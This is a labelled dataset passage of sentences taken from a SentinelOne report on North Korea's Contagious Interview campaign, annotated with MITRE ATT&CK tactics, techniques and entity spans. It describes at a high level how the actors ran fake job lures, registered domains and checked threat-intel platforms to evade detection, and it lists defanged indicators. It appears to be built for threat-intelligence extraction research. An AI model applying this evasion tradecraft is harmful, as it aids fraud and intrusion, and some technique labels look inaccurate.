"58_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "We also identified indicators of real-time teamwork, including possible use of the Slack platform to coordinate their investigations.", "sentence_text": "Despite thoroughly examining threat intelligence and identifying artifacts that can be used to discover their infrastructure, the threat actors did not implement systematic, large-scale changes to make it harder to detect, thereby reducing its exposure to discovery and disruption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s17-c12d04", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Despite thoroughly examining threat intelligence and identifying artifacts that can be used to discover their infrastructure, the threat actors did not implement systematic, large-scale changes to make it harder to detect, thereby reducing its exposure to discovery and disruption.", "sentence_text": "Instead, we observed only sporadic, limited-scale changes targeting specific artifacts used to identify Contagious Interview infrastructure, while the threat actors rapidly deployed new infrastructure in response to service provider takedowns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564", "name": "Hide Artifacts" }, { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Changed artifacts and deployed new infrastructure", "entities": [ { "text": "Contagious Interview", "start": 104, "end": 124, "label": "ThreatActor" }, { "text": "changes targeting specific artifacts", "start": 50, "end": 86, "label": "Action" }, { "text": "deployed new infrastructure", "start": 173, "end": 200, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s18-d08917", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Instead, we observed only sporadic, limited-scale changes targeting specific artifacts used to identify Contagious Interview infrastructure, while the threat actors rapidly deployed new infrastructure in response to service provider takedowns.", "sentence_text": "This may reflect a focus on investing resources to maintain operational readiness and sustain the campaign’s high volume of victim engagement by deploying new infrastructure rather than undertaking broad modifications to protect existing infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s19-329b8b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "This may reflect a focus on investing resources to maintain operational readiness and sustain the campaign’s high volume of victim engagement by deploying new infrastructure rather than undertaking broad modifications to protect existing infrastructure.", "sentence_text": "Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s20-49d337", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets.", "sentence_text": "The threat actors also used Validin to scout and evaluate new infrastructure before acquisition, likely aiming to avoid assets previously flagged as malicious, which would increase detection risk and reduce operational effectiveness once deployed.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Find if new infrastructure has known malware before acquisition", "entities": [ { "text": "Validin ", "start": 28, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "scout ", "start": 39, "end": 45, "label": "Action" }, { "text": "evaluate new infrastructure before acquisition", "start": 49, "end": 95, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s21-daba61", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The threat actors also used Validin to scout and evaluate new infrastructure before acquisition, likely aiming to avoid assets previously flagged as malicious, which would increase detection risk and reduce operational effectiveness once deployed.", "sentence_text": "Following acquisition, they continued to monitor their assets for signs of detection throughout their lifecycle.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Monitor assets for detection", "entities": [ { "text": "monitor their assets for signs of detection", "start": 41, "end": 84, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s22-b6dc70", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Following acquisition, they continued to monitor their assets for signs of detection throughout their lifecycle.", "sentence_text": "Contagious Interview activities predominantly target individuals active in the cryptocurrency industry, aiming to gain access to their systems for various purposes, including intelligence collection and the theft of cryptocurrency assets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Gain access to individual's systems for intelligence collection and theft of assets", "entities": [ { "text": "Contagious Interview", "start": 0, "end": 20, "label": "ThreatActor" }, { "text": "target individuals", "start": 46, "end": 64, "label": "Action" }, { "text": " gain access to their systems", "start": 113, "end": 142, "label": "Action" }, { "text": "cryptocurrency industry", "start": 79, "end": 102, "label": "Infrastructure_Indicator" }, { "text": " intelligence collection", "start": 174, "end": 198, "label": "Action" }, { "text": "theft of cryptocurrency assets", "start": 207, "end": 237, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s23-f3b275", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Contagious Interview activities predominantly target individuals active in the cryptocurrency industry, aiming to gain access to their systems for various purposes, including intelligence collection and the theft of cryptocurrency assets.", "sentence_text": "This supports North Korea’s efforts in evading sanctions and generating illicit revenue for financing its projects, including missile programmes Contagious Interview campaigns have been typically associated with the umbrella threat cluster Lazarus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s24-5aa878", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "This supports North Korea’s efforts in evading sanctions and generating illicit revenue for financing its projects, including missile programmes Contagious Interview campaigns have been typically associated with the umbrella threat cluster Lazarus.", "sentence_text": "DTEX Systems has attributed these campaigns to a group referred to as Gwisin Gang, which likely emerged from an IT organization whose subordination within the North Korean state apparatus is still subject to assessment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s25-258638", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "DTEX Systems has attributed these campaigns to a group referred to as Gwisin Gang, which likely emerged from an IT organization whose subordination within the North Korean state apparatus is still subject to assessment.", "sentence_text": "We assess that the threat actors whose activities are discussed in this post are involved in these campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s27-62152f", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "ClickFix typically proceeds as follows.", "sentence_text": "A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Send invitation to targeted people with malicious link to a lure website", "entities": [ { "text": "receives an invitation", "start": 22, "end": 44, "label": "Action" }, { "text": "directing them to a lure website", "start": 90, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s28-ac6003", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.", "sentence_text": "This technique is discussed in more detail in previous research Account Registrations | Initial Activities", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s29-14e18f", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "This technique is discussed in more detail in previous research Account Registrations | Initial Activities", "sentence_text": "We present below the email addresses used for account registrations as well as the IP addresses from which the registrations were conducted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s30-536cca", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "We present below the email addresses used for account registrations as well as the IP addresses from which the registrations were conducted.", "sentence_text": "We attribute this activity to Contagious Interview threat actors based on multiple indicators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s31-96e747", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "We attribute this activity to Contagious Interview threat actors based on multiple indicators.", "sentence_text": "Additionally, even before the account registrations, SentinelLABS and Validin were already tracking the email addresses fairdev610[@]gmail.com , richardkdavis45[@]gmail.com , rockstar96054[@]gmail.com , excellentreporter321[@]gmail.com , and hundredup2023[@]gmail.com as Contagious Interview artifacts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s32-ea50d9", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Additionally, even before the account registrations, SentinelLABS and Validin were already tracking the email addresses fairdev610[@]gmail.com , richardkdavis45[@]gmail.com , rockstar96054[@]gmail.com , excellentreporter321[@]gmail.com , and hundredup2023[@]gmail.com as Contagious Interview artifacts.", "sentence_text": "We found these addresses in unintentionally exposed JavaScript scripts ( Node.js applications) on Contagious Interview ClickFix malware distribution servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s33-78b569", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "We found these addresses in unintentionally exposed JavaScript scripts ( Node.js applications) on Contagious Interview ClickFix malware distribution servers.", "sentence_text": "We have been tracking these Node.js applications under the ContagiousDrop moniker since their initial exposure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s34-6588cd", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "We have been tracking these Node.js applications under the ContagiousDrop moniker since their initial exposure.", "sentence_text": "Typically implemented as app.js files, the applications distribute malware to targeted individuals and notify the threat actors via email about victim engagement.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Distribute malware and notify actors about targeted individuals", "entities": [ { "text": "distribute malware to targeted individuals", "start": 56, "end": 98, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s35-094e0b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Typically implemented as app.js files, the applications distribute malware to targeted individuals and notify the threat actors via email about victim engagement.", "sentence_text": "A ContagiousDrop sample is highlighted in previous research on Contagious Interview activity published in April 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s36-b58726", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "A ContagiousDrop sample is highlighted in previous research on Contagious Interview activity published in April 2025.", "sentence_text": "These applications will be discussed in greater detail later in this blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s37-a92e85", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "These applications will be discussed in greater detail later in this blog post.", "sentence_text": "Moreover, some email addresses have been used for registering Contagious Interview domains pointing to lure websites.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" }, { "id": "T1585.002", "name": "Email Accounts" } ], "procedure": "Used email addresses to register attacker domains", "entities": [ { "text": "Contagious Interview", "start": 62, "end": 82, "label": "ThreatActor" }, { "text": "domains ", "start": 83, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "email addresses have been used for registering", "start": 15, "end": 61, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s38-1268bc", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Moreover, some email addresses have been used for registering Contagious Interview domains pointing to lure websites.", "sentence_text": "For example, marvel714jm[@]gmail.com and jimmr6587[@]gmail.com have been used to register the paxos-video-interview[.]com and skill-share[.]org domains, respectively.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Used email to register domains", "entities": [ { "text": "marvel714jm[@]gmail.com", "start": 13, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "jimmr6587[@]gmail.com", "start": 41, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "interview[.]com", "start": 106, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "skill-share[.]org", "start": 126, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "paxos-video-i", "start": 94, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "used to register", "start": 73, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s39-0c9ee8", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "For example, marvel714jm[@]gmail.com and jimmr6587[@]gmail.com have been used to register the paxos-video-interview[.]com and skill-share[.]org domains, respectively.", "sentence_text": "Finally, some email addresses were used to register Validin accounts from IP addresses that were also used to register or log in to accounts with other email addresses we attribute with high confidence to Contagious Interview.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Use email addresses and IP addresses to register and log in to Validin accounts.", "entities": [ { "text": "used to register Validin accounts", "start": 35, "end": 68, "label": "Action" }, { "text": "used to register or log in to accounts", "start": 102, "end": 140, "label": "Action" }, { "text": "email addresses", "start": 14, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "IP addresses", "start": 74, "end": 86, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s40-8b7d93", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "Finally, some email addresses were used to register Validin accounts from IP addresses that were also used to register or log in to accounts with other email addresses we attribute with high confidence to Contagious Interview.", "sentence_text": "For example, the account montessantiago9712[@]gmail.com was registered from the IP address 38.170.181[.]10 , the same as jimmr6587[@]gmail.com Approximately 15 minutes after the first observed account registration, Validin blocked the Contagious Interview accounts and subsequently prevented further community registrations originating from known Astrill VPN IP addresses or using Gmail accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s41-313920", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "For example, the account montessantiago9712[@]gmail.com was registered from the IP address 38.170.181[.]10 , the same as jimmr6587[@]gmail.com Approximately 15 minutes after the first observed account registration, Validin blocked the Contagious Interview accounts and subsequently prevented further community registrations originating from known Astrill VPN IP addresses or using Gmail accounts.", "sentence_text": "Account Registrations | Further Activities After likely realizing that their access to Validin had been blocked, Contagious Interview threat actors attempted to register community accounts again on 25 March 2025 (13 days after the initial registration activity) and 26 April 2025.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Register community accounts again", "entities": [ { "text": "Contagious Interview", "start": 113, "end": 133, "label": "ThreatActor" }, { "text": "register community accounts", "start": 161, "end": 188, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s42-e82a69", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Account Registrations | Further Activities After likely realizing that their access to Validin had been blocked, Contagious Interview threat actors attempted to register community accounts again on 25 March 2025 (13 days after the initial registration activity) and 26 April 2025.", "sentence_text": "The domain registration records for versusx[.]us include the email address brooksliam534[@]gmail.com , which has also been used to register several Contagious Interview domains discussed in previous research , such as willotalent[.]us and nvidia-release[.]us .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s43-1672e8", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "The domain registration records for versusx[.]us include the email address brooksliam534[@]gmail.com , which has also been used to register several Contagious Interview domains discussed in previous research , such as willotalent[.]us and nvidia-release[.]us .", "sentence_text": "Additionally, indicators suggest that the brooksliam534[@]gmail.com account has been involved in publishing malicious npm (Node Package Manager) packages ( cors-app and cors-parser ) as part of a software supply chain campaign attributed to Contagious Interview threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "Publish malicious npm packages (cors-app, cors-parser) in a software supply chain campaign", "entities": [ { "text": "brooksliam534[@]gmail.com", "start": 42, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "publishing malicious npm (Node Package Manager) packages", "start": 97, "end": 153, "label": "Action" }, { "text": "Contagious Interview", "start": 241, "end": 261, "label": "ThreatActor" }, { "text": "cors-app", "start": 156, "end": 164, "label": "MalwareTool" }, { "text": "cors-parser", "start": 169, "end": 180, "label": "MalwareTool" }, { "text": "software supply chain campaign", "start": 196, "end": 226, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s44-eecd18", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Additionally, indicators suggest that the brooksliam534[@]gmail.com account has been involved in publishing malicious npm (Node Package Manager) packages ( cors-app and cors-parser ) as part of a software supply chain campaign attributed to Contagious Interview threat actors.", "sentence_text": "We observed the registration of invite[@]quiz-nest[.]com approximately two minutes after the threat actors attempted to register mvsolution9[@]gmail.com .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Register accounts", "entities": [ { "text": "invite[@]quiz-nest[.]com", "start": 32, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "registration ", "start": 16, "end": 29, "label": "Action" }, { "text": "mvsolution9[@]gmail.com", "start": 129, "end": 152, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s45-9e9dd1", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "We observed the registration of invite[@]quiz-nest[.]com approximately two minutes after the threat actors attempted to register mvsolution9[@]gmail.com .", "sentence_text": "The registration of mvsolution9[@]gmail.com failed due to measures Validin implemented following the March 2025 account registration activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s46-dbc10e", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "The registration of mvsolution9[@]gmail.com failed due to measures Validin implemented following the March 2025 account registration activities.", "sentence_text": "mvsolution9[@]gmail.com\nhas been used to register two Contagious Interview domains:\nevalassesso[.]com\n, which Sekoia has also attributed to Contagious Interview, and speakure[.]com .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Register domains", "entities": [ { "text": "mvsolution9[@]gmail.com", "start": 0, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "used to register two Contagious Interview domains", "start": 33, "end": 82, "label": "Action" }, { "text": "Contagious Interview", "start": 54, "end": 74, "label": "ThreatActor" }, { "text": "evalassesso[.]com", "start": 84, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "speakure[.]com", "start": 166, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "Contagious Interview", "start": 140, "end": 160, "label": "ThreatActor" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s47-8adf23", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "mvsolution9[@]gmail.com\nhas been used to register two Contagious Interview domains:\nevalassesso[.]com\n, which Sekoia has also attributed to Contagious Interview, and speakure[.]com .", "sentence_text": "We also observed login attempts on 9 May 2025 using the excellentreporter321[@]gmail.com and marvel714jm[@]gmail.com accounts, which had been blocked by Validin in March 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s48-f8ec4e", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "We also observed login attempts on 9 May 2025 using the excellentreporter321[@]gmail.com and marvel714jm[@]gmail.com accounts, which had been blocked by Validin in March 2025.", "sentence_text": "Recognizing their persistence in obtaining community access, we intentionally kept only the info[@]versusx[.]us account active to monitor subsequent activity, determine their objectives, and gather further intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s49-3759c2", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "Recognizing their persistence in obtaining community access, we intentionally kept only the info[@]versusx[.]us account active to monitor subsequent activity, determine their objectives, and gather further intelligence.", "sentence_text": "Since then, the Contagious Interview threat actors have continued attempting to register new Validin accounts through the time of writing this post.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Threat actors attempt to register new accounts on Validin to establish access and continue operations", "entities": [ { "text": "Contagious Interview threat actors", "start": 16, "end": 50, "label": "ThreatActor" }, { "text": "continued attempting to register new Validin accounts", "start": 56, "end": 109, "label": "Action" }, { "text": "Validin accounts", "start": 93, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s50-90438a", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Since then, the Contagious Interview threat actors have continued attempting to register new Validin accounts through the time of writing this post.", "sentence_text": "Account Registrations | Personas", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s51-e510fb", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "Account Registrations | Personas", "sentence_text": "The reuse of the name Anika Larkin for two different accounts, invite[@]quiz-nest[.]com and mvsolution9[@]gmail.com , combined with both accounts being registered from the same IP address ( 181.215.9[.]29 ) within approximately two minutes, suggests the involvement of a single individual.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s52-8fc088", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "The reuse of the name Anika Larkin for two different accounts, invite[@]quiz-nest[.]com and mvsolution9[@]gmail.com , combined with both accounts being registered from the same IP address ( 181.215.9[.]29 ) within approximately two minutes, suggests the involvement of a single individual.", "sentence_text": "Some affiliations correspond to fake hiring platforms operated by Contagious Interview.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s53-65509e", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "Some affiliations correspond to fake hiring platforms operated by Contagious Interview.", "sentence_text": "The account marvel714jm[@]gmail.com , which used the Paxos affiliation, was also used to register the domain paxos-video-interview[.]com .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Register domains", "entities": [ { "text": "marvel714jm[@]gmail.com", "start": 12, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "Paxos affiliation", "start": 53, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "used to register the domain", "start": 81, "end": 108, "label": "Action" }, { "text": "paxos-video-interview[.]com", "start": 109, "end": 136, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s54-d583b1", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "The account marvel714jm[@]gmail.com , which used the Paxos affiliation, was also used to register the domain paxos-video-interview[.]com .", "sentence_text": "This suggests the actors leveraged their own infrastructure and fabricated brands to create a more convincing facade of legitimacy.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.002", "name": "Code Signing Certificates" } ], "procedure": "Leverage infrastructure and fabricate brands to create a facade of legitimacy", "entities": [ { "text": "leveraged their own infrastructure", "start": 25, "end": 59, "label": "Action" }, { "text": "fabricated brands", "start": 64, "end": 81, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s55-d03203", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "This suggests the actors leveraged their own infrastructure and fabricated brands to create a more convincing facade of legitimacy.", "sentence_text": "Validin Use | Activity Across Multiple Platforms", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s56-84685b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "Validin Use | Activity Across Multiple Platforms", "sentence_text": "The majority of accounts began using the Validin platform immediately after registration.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Used Validin platform", "entities": [ { "text": "using the Validin platform immediately after registration", "start": 31, "end": 88, "label": "Action" }, { "text": "Validin platform", "start": 41, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s57-b241fe", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "The majority of accounts began using the Validin platform immediately after registration.", "sentence_text": "The threat actors did not search for any IOCs reported in Validin’s blog post , which we suspect triggered their initial interest in the platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s58-648249", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "The threat actors did not search for any IOCs reported in Validin’s blog post , which we suspect triggered their initial interest in the platform.", "sentence_text": "We observed indicators suggesting that the threat actors used additional IOC repositories and platforms alongside Validin to conduct comprehensive investigations.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Used IOC repositories and platform to conduct overall investigations", "entities": [ { "text": "used additional IOC repositories", "start": 57, "end": 89, "label": "Action" }, { "text": "Validin ", "start": 114, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "conduct comprehensive investigations", "start": 125, "end": 161, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s59-d8ddf0", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "We observed indicators suggesting that the threat actors used additional IOC repositories and platforms alongside Validin to conduct comprehensive investigations.", "sentence_text": "These included VirusTotal and the apt_lazarus.txt file, which is part of the Maltrail project and publicly available on GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s60-aa82ad", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "These included VirusTotal and the apt_lazarus.txt file, which is part of the Maltrail project and publicly available on GitHub.", "sentence_text": "The keyword was first published as an artifact identifying Contagious Interview websites approximately one day earlier by Maltrail in apt_lazarus.txt , on 11 March 2025 at 11:18:22 UTC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s61-169dd1", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "The keyword was first published as an artifact identifying Contagious Interview websites approximately one day earlier by Maltrail in apt_lazarus.txt , on 11 March 2025 at 11:18:22 UTC.", "sentence_text": "This suggests that the threat actors likely used Validin to investigate what additional information the platform could provide based on the TalentCheck keyword they first observed in apt_lazarus.txt Most of the search terms the threat actors used in Validin had been published exclusively in apt_lazarus.txt at the time of the search and were queried shortly after their appearance in the file, sometimes within less than an hour.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Used Validin to search about themselves", "entities": [ { "text": "Validin ", "start": 49, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "used Validin to investigate", "start": 44, "end": 71, "label": "ThreatActor" }, { "text": "apt_lazarus.txt", "start": 183, "end": 198, "label": "MalwareTool" }, { "text": "apt_lazarus.txt", "start": 292, "end": 307, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s62-b255d9", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "This suggests that the threat actors likely used Validin to investigate what additional information the platform could provide based on the TalentCheck keyword they first observed in apt_lazarus.txt Most of the search terms the threat actors used 